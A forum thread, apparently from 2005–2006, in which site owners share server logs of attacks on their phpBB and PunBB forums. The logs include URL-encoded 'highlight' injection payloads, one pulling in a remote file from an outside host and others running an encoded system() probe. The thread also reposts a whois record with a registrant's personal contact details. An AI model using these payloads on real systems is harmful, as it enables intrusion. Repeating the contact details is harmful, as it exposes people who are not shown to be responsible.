Topic: Attempted Hack

My bandwidth had a big spike, so I trawled thru logs and found lots of these:

38.112.131.75 - - "GET /forum/viewtopic.php?pid=1197&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 31309 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t f**k Aleks)"

(I edited the swear word there)

What were they intending to do?

2

Re: Attempted Hack

They were trying to hack into phpBB wink

3 (edited by MathsIsFun 2005-12-11 10:50)

Re: Attempted Hack

Ahh ... were they being silly, then?

I think all they managed to do was to use a little bandwidth. Potentially nasty stuff, though ... I imagine PunBB is immune to this kind of attack.

Note: IP was different for each log entry, so they were spoofing that.

Any clues as to tracking these criminals down?

Re: Attempted Hack

The file "http://www.yatas.com/phpbb_private.txt" is:

<body bgcolor="black">
<center><img src="http://sinanreklam.net/images/owned.jpg"><br><font color="white" size="3">hehehehe</center>
</body>

And a whois on yatas.com reveals:

Registrant:
     Muammer OZTASKIN ahmetk@artmedya.com +90.2125075142
     Muammer OZTASKIN
     Keresteciler Sitesi Cinar Sokak
     Istanbul,TR,TR 34010


Domain Name:yatas.com
Record last updated at 2005-05-27 10:12:58
Record created on 1997/6/9
Record expired on 2010/6/9


Domain servers in listed order:
     ns.artmedya.com      ns2.artmedya.com

Administrator:
     name:(Ahmet Karamanlargil)
    Email:(ahmetk@artmedya.com) tel-- +90.2125075142
     Artmedya Internet Reklamcilik Ltd Sti
     Keresteciler Sitesi Cinar Sokak

Re: Attempted Hack

Send an email over to the FBI.

Re: Attempted Hack

The same guy is doing something with my forum. I'll post back with more info soon.

Looking for a certain modification for your forum? Please take a look here before posting.

Re: Attempted Hack

Here's a shot of my BBClone log:

http://img273.imageshack.us/img273/4354/hacker2we.th.png

Same user agent string. It hits different pages on my forum, not just the index.

Looking for a certain modification for your forum? Please take a look here before posting.

Re: Attempted Hack

Yep, the IP seems to be randomly generated.

Same file trying to be inserted: "http://www.yatas.com/phpbb_private.txt" ?

We could possibly get that site shut down ... and try to follow the trail further.

9 (edited by snapsolutions 2006-03-20 03:49)

Re: Attempted Hack

I was going thru my logs on my server and this is what is going on right now!

66.96.216.85 - - [19/Mar/2006:21:31:55 -0500] "GET /viewtopic.php?pid=3879&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
66.98.198.79 - - [19/Mar/2006:21:32:07 -0500] "GET /viewtopic.php?id=18&p=1&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
66.98.198.79 - - [19/Mar/2006:21:32:07 -0500] "GET /viewtopic.php?id=18&p=1&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
72.36.244.188 - - [19/Mar/2006:21:33:08 -0500] "GET /viewtopic.php?pid=6065&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
71.245.177.132 - - [19/Mar/2006:21:33:12 -0500] "GET /viewtopic.php?pid=3879&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
207.44.232.113 - - [19/Mar/2006:21:33:39 -0500] "GET /viewtopic.php?id=18&p=1&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
66.45.58.204 - - [19/Mar/2006:21:33:41 -0500] "GET /viewtopic.php?pid=6065&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
216.235.248.186 - - [19/Mar/2006:21:38:24 -0500] "GET /viewtopic.php?id=18&p=1&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 702 "-" "Mozilla/4.0"
217.112.37.95 - - [19/Mar/2006:21:38:29 -0500] "GET /viewtopic.php?pid=6065&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 702 "-" "Mozilla/4.0"
64.38.19.234 - - [19/Mar/2006:21:38:54 -0500] "GET /viewtopic.php?id=18&p=2&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 702 "-" "Mozilla/4.0"
216.120.237.70 - - [19/Mar/2006:21:39:04 -0500] "GET /viewtopic.php?id=195&p=3&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 702 "-" "Mozilla/4.0"

I guess it's another phpBB attack smile